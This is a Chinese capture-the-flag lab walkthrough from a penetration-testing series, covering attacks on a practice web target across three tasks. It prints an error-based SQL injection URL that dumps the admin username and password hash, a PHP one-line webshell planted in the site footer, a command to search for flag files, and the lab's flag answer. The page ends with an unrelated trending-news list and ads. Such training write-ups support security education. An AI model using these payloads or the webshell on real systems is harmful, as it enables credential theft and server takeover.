11-在线挑战详细攻略-《渗透测试笔记》
本题目:获取ww.test.ichunqiu后台登录密码。
本文作者:i春秋作家——独狼1927
Step 01
> 目标地址:172.16.12.2 172.16.12.3(注意:本实验中一共有两个目标地址) 本机地址:172.16.11.2 第一题的要求是获取ww.test.ichunqiu后台登录密码。 首先打开浏览器,进入首页ww.test.ichunqiu, 自己注册一个账户,进入 [会员中心],点击左侧菜单 [专题管理] 下的 [创建专题],详情如下图所示:



http://www.test.ichunqiu/member/special.php?
job=show_BBSiframe&type=myatc&id=12&
TB_pre=qb_module where 1=1 or 1=updatexml(2,concat(0x7e,
((select concat(username,0x5c,password) from qb_members limit 0,1))),0) %23
请求完毕后可以很明显的看出,响应包返回的报错信息中,包含了管理员的用户名和一部分密码hash值,不过MD5长度不够,没关系,继续往下看;

http://www.test.ichunqiu/member/special.php?
job=show_BBSiframe&type=myatc&id=12&
TB_pre=qb_module where 1=1 or 1=updatexml(2,concat(0,
((select concat(password) from qb_members limit 0,1))),0) %23


Step 02
> 第二题的要求是获取目标服务器1管理员桌面的Flag文件信息。 打开后台地址,输入之前获得的管理员用户名和密码;(后台地址是/admin,不会的童鞋用想念御剑一类的工具一跑就出来了)

<?php @assert($_POST['ichunqiu']);?>
注意:这里不能使用eval,否则会被截断,会木马无法正常执行,不信你可以试一试~
然后点击页面下方的 [保存] 设置进行保存。一般情况下,网站页面的底部都会放网站备案信息,所以把一句话木马放在这里,方便利用。








dir /s *flag*.txt
即可找到桌面文件下的Flag文件,type一下就能看到flag值。
这里特别说明一下,Flag文件中的内容是Key{636bb37e},但是在提交第二题答案的时候,只需要提交大括号中的8位字符即可,否则你永远得不了100分~

Step 03
> 第三题的要求是获取网站论坛数据库中admin的盐值,注意,不是网站数据库,是论坛数据库! 论坛的地址是bbs.test.ichunqiu, IP地址是172.16.12.3 在网站目录下发现一个dedecms_bak文件夹,该目录下的/data/common.inc.php文件就是论坛数据库的配置文件,准确说是配置文件的备份,里面有连接数据库需要的有用信息:





关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 古今接力赓续中华文脉 7904840
- 2 台湾旅行团整团被卖到缅甸 7807892
- 3 未来5年地球将遇“致命高温” 7712591
- 4 “两重”建设为什么如此重要 7619589
- 5 外交部回应日本人在华被害 7522931
- 6 胡歌新身份正式官宣 7423598
- 7 大连警方:男子杀害2名日本人被刑拘 7333642
- 8 儿子过瘦遭质疑 姚晨:我真不是后妈 7238749
- 9 贾跃亭数度哽咽:散户救了我们的命 7140536
- 10 去中国要带空箱子 7047400